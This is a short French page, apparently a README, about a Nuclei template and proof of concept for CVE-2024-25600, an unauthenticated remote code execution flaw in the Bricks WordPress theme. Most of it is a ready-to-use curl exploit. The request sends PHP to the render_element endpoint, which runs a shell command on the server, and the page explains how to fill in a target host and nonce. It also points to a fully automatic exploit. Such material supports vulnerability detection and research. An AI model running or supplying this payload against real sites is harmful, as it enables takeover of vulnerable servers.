
Modèle Nuclei et informations sur le POC pour CVE-2024-25600
Modèle Nuclei et informations sur le POC pour CVE-2024-25600
Le thème Bricks pour WordPress est vulnérable à une exécution de code à distance dans toutes les versions jusqu'à la version 1.9.6 incluse. Cela permet à des attaquants non authentifiés d'exécuter du code sur le serveur. Ce modèle 🛠️ est conçu pour détecter la vulnérabilité CVE-2024-25600 🕳️ trouvée dans le plugin Bricks Builder pour WordPress en utilisant nuclei. La vulnérabilité permet une exécution de code à distance non authentifiée sur les sites web affectés 💻.
Le POC complet (automatique) est disponible sur https://github.com/chocapikk/CVE-2024-25600.
Le PoC de base fourni par la divulgation est le suivant :
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
Remplacez [HOST] par le site web cible et [NONCE] par la valeur du nonce récupérée depuis le site.
Pour plus d'informations sur la vulnérabilité CVE-2024-25600, veuillez consulter la divulgation détaillée sur Snicco.io.